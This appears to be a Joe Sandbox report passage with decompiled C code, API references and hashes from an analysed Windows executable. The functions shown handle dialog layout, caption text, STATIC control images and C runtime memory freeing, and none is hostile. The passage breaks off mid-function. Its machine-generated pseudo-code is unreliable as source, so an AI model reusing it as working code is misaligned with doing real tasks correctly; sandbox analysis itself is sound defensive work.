                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                    • Instruction ID: 06d3a27e9a71f61af07d947a22166c4eb594c98390c8c90c9b059b12e6351926
                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                    • Instruction Fuzzy Hash: D1312AB1A1474A8FCB18DF28C85126EBBE0FB95304F50452EE5D5C7781C734EA0ACB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00CCE2E8(struct HWND__* __ecx, void* __edx, void* __eflags, intOrPtr _a8) {
				char _v0;
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t95;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				signed int _t145;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				void* _t178;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;
				signed int _t221;

				_t178 = __edx;
				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E00CC4092( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E00CD1DA7( &_v2208,  &_v2288, 0x50);
				_t95 = E00CE3E90( &_v2300);
				_t187 = _v8;
				_t155 = 0;
				_v2376 = _t95;
				_t210 =  *0xcfe720 - _t155; // 0x64
				if(_t210 <= 0) {
					L8:
					_t156 = E00CCD81C(_t155, _t203, _t178, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t169 - _t179;
					if(_v0 == 0) {
						if(_t156 != 0) {
							_t158 = 0x64;
							asm("cdq");
							_t134 = _v2292 * _v2368.top;
							_t160 = _t179 * _v2368.right / _t158 + _v2352.right;
							_v2324 = _t160;
							asm("cdq");
							_t186 = _t134 % _v2352.top;
							_v2352.left = _t134 / _v2352.top + _t205;
							asm("cdq");
							asm("cdq");
							_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
							_t163 = (_t169 - _t160 - _t186 >> 1) + _v2352.bottom;
							if(_t163 < 0) {
								_t163 = 0;
							}
							if(_t201 < 0) {
								_t201 = 0;
							}
							_t145 =  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204;
							_t221 = _t145;
							 *0xd23150(_t187, 0, _t163, _t201, _v2324, _v2352.left, _t145);
							GetWindowRect(_t187,  &_v2368);
							_t156 = _v2393;
						}
						if(E00CCD89C(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048);
						}
					}
					_t206 = _t205 - GetSystemMetrics(8);
					_t106 = GetWindow(_t187, 5);
					_t188 = _t106;
					_v2368.bottom = _t188;
					if(_t156 == 0) {
						L23:
						return _t106;
					} else {
						_t157 = 0;
						while(_t188 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L23;
							}
							GetWindowRect(_t188,  &_v2320);
							_t170 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xd23150(_t188, 0, (_t194 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t193, 0x204);
							_t106 = GetWindow(_t188, 2);
							_t188 = _t106;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L23;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L23;
					}
				} else {
					_t202 = 0xcfe274;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0xcf4788
							_t150 = E00CE6740( &_v2288,  *_t9, _t95);
							_t208 = _t208 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t202[1]); // 0xcf4788
								if(E00CCD9F0(_t155, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
								}
							}
							_t95 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t155 -  *0xcfe720; // 0x64
					} while (_t214 < 0);
					goto L8;
				}
			}























































                                                    0x00cce2e8
                                                    0x00cce300
                                                    0x00cce30a
                                                    0x00cce30e
                                                    0x00cce313
                                                    0x00cce325
                                                    0x00cce32f
                                                    0x00cce334
                                                    0x00cce33b
                                                    0x00cce33e
                                                    0x00cce342
                                                    0x00cce348
                                                    0x00cce3a5
                                                    0x00cce3bd
                                                    0x00cce3c5
                                                    0x00cce3c9
                                                    0x00cce3d5
                                                    0x00cce3e7
                                                    0x00cce3ee
                                                    0x00cce3f2
                                                    0x00cce3f5
                                                    0x00cce3fd
                                                    0x00cce40b
                                                    0x00cce40f
                                                    0x00cce417
                                                    0x00cce424
                                                    0x00cce427
                                                    0x00cce430
                                                    0x00cce435
                                                    0x00cce43b
                                                    0x00cce43f
                                                    0x00cce440
                                                    0x00cce446
                                                    0x00cce450
                                                    0x00cce457
                                                    0x00cce460
                                                    0x00cce464
                                                    0x00cce468
                                                    0x00cce46a
                                                    0x00cce46a
                                                    0x00cce46e
                                                    0x00cce470
                                                    0x00cce470
                                                    0x00cce483
                                                    0x00cce483
                                                    0x00cce496
                                                    0x00cce4a2
                                                    0x00cce4a8
                                                    0x00cce4a8
                                                    0x00cce4d0
                                                    0x00cce4db
                                                    0x00cce4db
                                                    0x00cce4d0
                                                    0x00cce4ec
                                                    0x00cce4ee
                                                    0x00cce4f4
                                                    0x00cce4f6
                                                    0x00cce4fc
                                                    0x00cce5ae
                                                    0x00cce5ae
                                                    0x00cce502
                                                    0x00cce502
                                                    0x00cce59c
                                                    0x00cce509
                                                    0x00cce50f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce51b
                                                    0x00cce525
                                                    0x00cce53a
                                                    0x00cce53f
                                                    0x00cce542
                                                    0x00cce558
                                                    0x00cce560
                                                    0x00cce562
                                                    0x00cce563
                                                    0x00cce56b
                                                    0x00cce57d
                                                    0x00cce584
                                                    0x00cce58d
                                                    0x00cce593
                                                    0x00cce595
                                                    0x00cce599
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce59b
                                                    0x00cce59b
                                                    0x00cce59b
                                                    0x00000000
                                                    0x00cce59c
                                                    0x00cce34a
                                                    0x00cce34a
                                                    0x00cce34f
                                                    0x00cce352
                                                    0x00cce355
                                                    0x00cce35d
                                                    0x00cce362
                                                    0x00cce367
                                                    0x00cce378
                                                    0x00cce382
                                                    0x00cce38f
                                                    0x00cce38f
                                                    0x00cce382
                                                    0x00cce395
                                                    0x00cce395
                                                    0x00cce399
                                                    0x00cce39a
                                                    0x00cce39d
                                                    0x00cce39d
                                                    0x00000000
                                                    0x00cce34f

                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CCE30E
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                      • Part of subcall function 00CD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00D01030,?,00CCD928,00000000,?,00000050,00D01030), ref: 00CD1DC4
                                                    • _strlen.LIBCMT ref: 00CCE32F
                                                    • SetDlgItemTextW.USER32(?,00CFE274,?), ref: 00CCE38F
                                                    • GetWindowRect.USER32(?,?), ref: 00CCE3C9
                                                    • GetClientRect.USER32(?,?), ref: 00CCE3D5
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00CCE475
                                                    • GetWindowRect.USER32(?,?), ref: 00CCE4A2
                                                    • SetWindowTextW.USER32(?,?), ref: 00CCE4DB
                                                    • GetSystemMetrics.USER32(00000008), ref: 00CCE4E3
                                                    • GetWindow.USER32(?,00000005), ref: 00CCE4EE
                                                    • GetWindowRect.USER32(00000000,?), ref: 00CCE51B
                                                    • GetWindow.USER32(00000000,00000002), ref: 00CCE58D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                    • String ID: $%s:$CAPTION$d
                                                    • API String ID: 2407758923-2512411981
                                                    • Opcode ID: 609b74235080e9fd26f2ccf9ee0051e0ead25b3a8f1c627518432a11925528a5
                                                    • Instruction ID: 9f7dab9751ea383abf3d05121b62f6a968034305acb4cc82fa74c4e29333c29e
                                                    • Opcode Fuzzy Hash: 609b74235080e9fd26f2ccf9ee0051e0ead25b3a8f1c627518432a11925528a5
                                                    • Instruction Fuzzy Hash: 54819272208341AFD711DFA8CD89F6FBBE9EB89704F04092DFA95D7250D634E9058B62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CECB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CECB22(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xcfeea0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00CE8DCC(_t46);
							E00CEC701( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00CE8DCC(_t47);
							E00CEC7FF( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00CE8DCC( *((intOrPtr*)(_t74 + 0x7c)));
						E00CE8DCC( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00CE8DCC( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00CE8DCC( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00CE8DCC( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00CE8DCC( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00CECC95( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xcfe968) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00CE8DCC(_t31);
							E00CE8DCC( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00CE8DCC(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00CE8DCC(_t74);
			}















                                                    0x00cecb2a
                                                    0x00cecb2e
                                                    0x00cecb36
                                                    0x00cecb3f
                                                    0x00cecb44
                                                    0x00cecb4b
                                                    0x00cecb53
                                                    0x00cecb5b
                                                    0x00cecb66
                                                    0x00cecb6c
                                                    0x00cecb6d
                                                    0x00cecb75
                                                    0x00cecb7d
                                                    0x00cecb88
                                                    0x00cecb8e
                                                    0x00cecb92
                                                    0x00cecb9d
                                                    0x00cecba3
                                                    0x00cecb44
                                                    0x00cecba4
                                                    0x00cecbac
                                                    0x00cecbbf
                                                    0x00cecbd2
                                                    0x00cecbe0
                                                    0x00cecbeb
                                                    0x00cecbf0
                                                    0x00cecbf9
                                                    0x00cecc01
                                                    0x00cecc02
                                                    0x00cecc08
                                                    0x00cecc0b
                                                    0x00cecc0e
                                                    0x00cecc15
                                                    0x00cecc17
                                                    0x00cecc1b
                                                    0x00cecc23
                                                    0x00cecc2a
                                                    0x00cecc30
                                                    0x00cecc31
                                                    0x00cecc31
                                                    0x00cecc38
                                                    0x00cecc3a
                                                    0x00cecc3f
                                                    0x00cecc47
                                                    0x00cecc4c
                                                    0x00cecc4d
                                                    0x00cecc4d
                                                    0x00cecc50
                                                    0x00cecc53
                                                    0x00cecc56
                                                    0x00cecc59
                                                    0x00cecc59
                                                    0x00cecc6b

                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 00CECB66
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC71E
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC730
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC742
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC754
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC766
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC778
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC78A
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC79C
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7AE
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7C0
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7D2
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7E4
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7F6
                                                    • _free.LIBCMT ref: 00CECB5B
                                                      • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                      • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                    • _free.LIBCMT ref: 00CECB7D
                                                    • _free.LIBCMT ref: 00CECB92
                                                    • _free.LIBCMT ref: 00CECB9D
                                                    • _free.LIBCMT ref: 00CECBBF
                                                    • _free.LIBCMT ref: 00CECBD2
                                                    • _free.LIBCMT ref: 00CECBE0
                                                    • _free.LIBCMT ref: 00CECBEB
                                                    • _free.LIBCMT ref: 00CECC23
                                                    • _free.LIBCMT ref: 00CECC2A
                                                    • _free.LIBCMT ref: 00CECC47
                                                    • _free.LIBCMT ref: 00CECC5F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 8421841d45942cd3fd3fa13244151abf3cc91656ae64275534d8b99e54d5bc44
                                                    • Instruction ID: 07c35552de85e267b00680d9384c084dd3edcffb51d1eb35a4b8eaf94932f35c
                                                    • Opcode Fuzzy Hash: 8421841d45942cd3fd3fa13244151abf3cc91656ae64275534d8b99e54d5bc44
                                                    • Instruction Fuzzy Hash: 47315C316003869FEB20AA3ADC86B5A77E9BF10310F245429F56CD7192DF35EE45DB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDD69E(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t9;
				void* _t19;
				void* _t26;
				void* _t28;
				void* _t30;
				struct HWND__* _t33;
				struct HWND__* _t36;
				void* _t40;
				void* _t49;

				_t49 = __fp0;
				_t40 = __eflags;
				_t28 = __edx;
				E00CDEC50(0x1018);
				_t9 = E00CDA5C6(_t40);
				if(_t9 == 0) {
					L12:
					return _t9;
				}
				_t9 = GetWindow(_a4124, 5);
				_t33 = _t9;
				_t30 = 0;
				_t36 = _t33;
				if(_t33 == 0) {
					L11:
					goto L12;
				}
				while(_t30 < 0x200) {
					GetClassNameW(_t33,  &_a24, 0x800);
					if(E00CD1FBB( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t33, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t26 = SendMessageW(_t33, 0x173, 0, 0);
						if(_t26 != 0) {
							GetObjectW(_t26, 0x18,  &_v0);
							_t19 = E00CDA605(_v4);
							SendMessageW(_t33, 0x172, 0, E00CDA80C(_t28, _t49, _t26, E00CDA5E4(_v12), _t19));
							DeleteObject(_t26);
						}
					}
					_t9 = GetWindow(_t33, 2);
					_t33 = _t9;
					if(_t33 != _t36) {
						_t30 = _t30 + 1;
						if(_t33 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}















                                                    0x00cdd69e
                                                    0x00cdd69e
                                                    0x00cdd69e
                                                    0x00cdd6a3
                                                    0x00cdd6a8
                                                    0x00cdd6af
                                                    0x00cdd786
                                                    0x00cdd78c
                                                    0x00cdd78c
                                                    0x00cdd6c1
                                                    0x00cdd6c7
                                                    0x00cdd6c9
                                                    0x00cdd6cb
                                                    0x00cdd6cf
                                                    0x00cdd783
                                                    0x00000000
                                                    0x00cdd785
                                                    0x00cdd6d6
                                                    0x00cdd6ed
                                                    0x00cdd704
                                                    0x00cdd726
                                                    0x00cdd72a
                                                    0x00cdd734
                                                    0x00cdd73e
                                                    0x00cdd75d
                                                    0x00cdd764
                                                    0x00cdd764
                                                    0x00cdd72a
                                                    0x00cdd76d
                                                    0x00cdd773
                                                    0x00cdd777
                                                    0x00cdd779
                                                    0x00cdd77c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd77c
                                                    0x00000000
                                                    0x00cdd777
                                                    0x00000000

                                                    APIs
                                                    • GetWindow.USER32(?,00000005), ref: 00CDD6C1
                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00CDD6ED
                                                      • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CDD709
                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CDD720
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00CDD734
                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CDD75D
                                                    • DeleteObject.GDI32(00000000), ref: 00CDD764
                                                    • GetWindow.USER32(00000000,00000002), ref: 00CDD76D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                    • String ID: STATIC
                                                    • API String ID: 3820355801-1882779555
                                                    • Opcode ID: e8a3ee29a8e45c6855a2a507dd9afcf1948afcd99381cac99d1c740920cde545
                                                    • Instruction ID: f02a7983ed587fc2f8e2530f4c0f015479fb2ae6304f3ea1248e0c0fd75f7476
                                                    • Opcode Fuzzy Hash: e8a3ee29a8e45c6855a2a507dd9afcf1948afcd99381cac99d1c740920cde545
                                                    • Instruction Fuzzy Hash: EF1136729007107BE2316B709C4AFAF765CAF50701F014122FB22E23D5DA68CB4652B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CE96F1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xcf6430) {
					E00CE8DCC(_t52);
					_t26 = _a4;
				}
				E00CE8DCC( *((intOrPtr*)(_t26 + 0x3c)));
				E00CE8DCC( *((intOrPtr*)(_a4 + 0x30)));
				E00CE8DCC( *((intOrPtr*)(_a4 + 0x34)));
				E00CE8DCC( *((intOrPtr*)(_a4 + 0x38)));
				E00CE8DCC( *((intOrPtr*)(_a4 + 0x28)));
				E00CE8DCC( *((intOrPtr*)(_a4 + 0x2c)));
				E00CE8DCC( *((intOrPtr*)(_a4 + 0x40)));
				E00CE8DCC( *((intOrPtr*)(_a4 + 0x44)));
				E00CE8DCC( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00CE95A9(5,  &_v8);
				_v8 =  &_a4;
				return E00CE95F9(4,  &_v8);
			}




                                                    0x00ce96f7
                                                    0x00ce96fa
                                                    0x00ce9702
                                                    0x00ce9705
                                                    0x00ce970a
                                                    0x00ce970d
                                                    0x00ce9711
                                                    0x00ce971c
                                                    0x00ce9727
                                                    0x00ce9732
                                                    0x00ce973d
                                                    0x00ce9748
                                                    0x00ce9753
                                                    0x00ce975e
                                                    0x00ce976c
                                                    0x00ce9774
                                                    0x00ce977d
                                                    0x00ce9785
                                                    0x00ce9799

                                                    APIs
                                                    • _free.LIBCMT ref: 00CE9705
                                                      • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                      • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                    • _free.LIBCMT ref: 00CE9711
                                                    • _free.LIBCMT ref: 00CE971C
                                                    • _free.LIBCMT ref: 00CE9727
                                                    • _free.LIBCMT ref: 00CE9732
                                                    • _free.LIBCMT ref: 00CE973D
                                                    • _free.LIBCMT ref: 00CE9748
                                                    • _free.LIBCMT ref: 00CE9753
                                                    • _free.LIBCMT ref: 00CE975E
                                                    • _free.LIBCMT ref: 00CE976C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 2bbd228600dfcb42a189b381569f24a39f7efd25d74fd80bb0d924f88bcbabea
                                                    • Instruction ID: 97e97c6c3d0971b6da03d38c8d2b9ca87f69917969da4952af207fad62715136
                                                    • Opcode Fuzzy Hash: 2bbd228600dfcb42a189b381569f24a39f7efd25d74fd80bb0d924f88bcbabea
                                                    • Instruction Fuzzy Hash: F411A27611014AAFCB01EF96CC82CD93BB5EF14350B5555A1FA088F262DE32EB54AB84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E00CE2E31(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t261;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
